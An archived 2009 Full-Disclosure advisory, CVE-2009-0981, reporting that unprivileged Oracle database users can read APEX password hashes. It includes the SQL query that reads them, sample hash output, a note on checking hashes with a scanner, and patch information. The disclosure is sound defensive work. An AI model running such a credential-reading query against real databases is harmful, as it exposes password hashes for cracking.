lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <F3D44DE0-00E0-43D6-8446-4CD70041896C@red-database-security.com>
Date: Thu, 16 Apr 2009 07:51:11 +0200
From: Alexander Kornbrust <ak@...-database-security.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Unprivileged DB users can see APEX password
	hashes [CVE-2009-0981]

Unprivileged DB users can see APEX password hashes [CVE-2009-0981]

Name                      Unprivileged DB users can see APEX password  
hashes
Systems Affected  APEX 3.0 (optional component of 11.1.0.7 installation)
Severity                   High Risk
Category                 Password Disclosure
Vendor URL           http://www.oracle.com/
Author                     Alexander Kornbrust
CVE                         CVE-2009-0981
Advisory                 14 April 2009 (V 1.00)


Details:
Unprivileged database users can see APEX password hashes in  
FLOWS_030000.WWV_FLOW_USER.

SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS

USER_NAME    WEB_PASSWORD2
---------------------------------------------------------------------------
YURI         141FA790354FB6C72802FDEA86353F31

This password hash can be checked using a tool like Repscan.


Additional information is available in the following advisory.


Advisory:
http://www.red-database-security.com/advisory/apex_password_hashes.html


Patch Information:
Upgrade to Oracle APEX 3.2.


Verification:
Our Oracle database scanner Repscan was updated with the information  
from the Oracle
CPU April 2009 and can identify vulnerable databases.
More Information about Repscan can be found here:
http://www.sentrigo.com/repscan


History:
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published


About Red-Database-Security:
Red-Database-Security is the leading company for Oracle security.  
Within the last
6 years we reported several hundred vulnerabilities to Oracle.

--
(c) 2009 by Red-Database-Security GmbH
http://www.red-database-security.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ